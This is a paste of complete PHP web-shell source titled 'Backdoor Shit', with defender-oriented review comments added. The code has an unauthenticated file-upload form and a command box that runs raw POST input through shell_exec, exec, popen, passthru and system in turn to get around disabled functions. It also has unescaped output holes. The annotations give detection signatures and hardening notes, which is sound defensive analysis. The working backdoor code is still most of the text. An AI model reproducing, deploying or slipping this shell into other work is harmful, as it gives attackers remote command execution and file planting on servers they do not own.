willysec_id

Backdoor Shit

Oct 10th, 2022
PHP 3.16 KB | Cybersecurity | 0 0
  1.    
  2. <!DOCTYPE html>
  3. <html lang="en">
  4. <head>
  5.     <meta charset="UTF-8">
  6.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  7.     <meta name="viewport" content="width=device-width, initial-scale=1.0">
  8.     <title>File Uploader</title>
  9. </head>
  10. <body>
    <!-- Review note (defender's view): front end of a web shell. The page offers two
         forms, a file upload and a command box, and this markup shows no login or
         other access check in front of them. -->
    <!-- The hidden span below is a fixed string that is never displayed. Its purpose is
         not stated on the page (presumably a marker for recognising the file), but
         together with the title "File Uploader" it is a stable string for
         content-based scanning of a web root. -->
  11.     <span style="display:none">Vuln!!</span>
    <!-- Upload form: multipart POST with the fields "upload" (the file) and
         "upload_btn". -->
  12.     <form method="post" enctype="multipart/form-data">
  13.         <strong>Select a file to upload :</strong> <input type="file" name="upload" />
  14.         <br /><br/>
  15.         <button type="submit" name="upload_btn" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Upload the fucking shit</button>
  16.         <br /> <br/>
  17.     </form>
    <!-- Command form: POST with the fields "cmd" and "run_cmd" ("Komut Çalıştır" is
         Turkish for "Run Command"). These field names are what request logging or a
         WAF rule would see. The value attribute echoes $_POST['cmd'] back without HTML
         escaping, and the key is read even on a plain GET, where it is not set. -->
  18.     <form method="post">
  19.         <strong>Run Command (Komut Çalıştır): </strong><input type="text" name="cmd" placeholder="whoami" value="<?=$_POST['cmd'];?>" style="width:400px;border:1px solid #efefef;padding:5px 10px;height:40px" />
  20.         <br /><br />
  21.         <button type="submit" name="run_cmd" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Run command</button>
  22.         <br/><br/>
  23.     </form>
  24. </body>
  25. </html>
  26. <?php
    // Review note (defender's view): server side of a web shell. Nothing in this block
    // authenticates or restricts the caller, so whoever can reach the file can use both
    // branches below.
    //   - "upload_btn" branch: stores an uploaded file under its client-supplied name.
    //   - "run_cmd" branch: hands the raw POST field "cmd" to an OS command function.
    // Finding this file in a web root should be treated as evidence of compromise, not
    // as a vulnerable feature to patch.
  27.     if(isset($_POST["upload_btn"])){
            // The destination is the client-supplied file name, used as given: no
            // extension, content-type or size check is visible, and the path is relative
            // (presumably resolved against the script's working directory; confirm per
            // SAPI). The leading @ suppresses the warning move_uploaded_file() would
            // otherwise raise on failure, so failed attempts leave no PHP warning in
            // the error log.
            // Defensive angle: watch for new files appearing beside this script, and
            // make sure web-writable directories cannot execute scripts.
  28.         if(@move_uploaded_file($_FILES["upload"]["tmp_name"],$_FILES["upload"]["name"])){
                // The file name is written into the href and the link text without
                // HTML escaping.
  29.             print "File is uploaded,check it: <a href=\"{$_FILES["upload"]["name"]}\">{$_FILES["upload"]["name"]}</a>";
  30.         }else{
  31.             print "Can not upload the file!";
  32.         }
  33.     }elseif(isset($_POST["run_cmd"])){
  34.  
            // Taken straight from the request; no validation, allow-list or escaping
            // follows before it is executed.
  35.         $cmd = $_POST["cmd"];
  36.  
            // Fallback chain: shell_exec, exec, popen, passthru, system, tried in that
            // order. function_exists() reports false for functions disabled through
            // disable_functions, so the chain simply moves on to the next one. A
            // hardening list that omits any one of the five leaves this branch working.
            // Each branch echoes the command and its output into the page unescaped.
            // The Turkish labels mean "Function used" (Kullanılan işlev) and
            // "Command sent" (Gönderilen Komut). They are fixed strings in the response
            // body and can serve as content signatures.
  37.         if(function_exists("shell_exec")){
  38.             $run = shell_exec($cmd);
  39.             echo "<font color=\"red\">Kullanılan işlev : shell_exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><pre>$run</pre>";
  40.         }elseif(function_exists("exec")){
                // exec() returns only the last output line in $run; the full output is
                // collected line by line in $result and printed below.
  41.             $run = exec($cmd,$result);
  42.             echo "<font color=\"red\">Kullanılan işlev : exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  43.             foreach($result as $res){
  44.                 $res = trim($res);
  45.                 echo "<strong>exec-> $res</strong><br />";
  46.             }
  47.         }elseif(function_exists("popen")){
                // Reads the process output in chunks of up to 4096 bytes until EOF,
                // then closes the pipe.
  48.             $run = popen($cmd,"r");
  49.             $result = "";
  50.             echo "<font color=\"red\">Kullanılan işlev : popen() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><br/>";
  51.             while(!feof($run)){
  52.                 $buffer = fgets($run,4096);
  53.                 $result .= "<strong>popen -> $buffer</strong><br />";
  54.             }
  55.             pclose($run);
  56.             echo $result;
  57.         }elseif(function_exists("passthru")){
                // passthru() and system() write the command output directly to the
                // response; the label is printed after it.
  58.             passthru($cmd);
  59.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : passthru() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  60.         }elseif(function_exists("system")){
  61.             system($cmd);
  62.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : system() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  63.         }else{
                // Reached only when all five functions are unavailable ("Aktif değil"
                // is Turkish for "not active").
  64.             print "passthru(),shell_exec(),exec(),popen(),system() functions are disabled / Aktif değil!";
  65.         }
  66.  
  67.     }
  68. ?>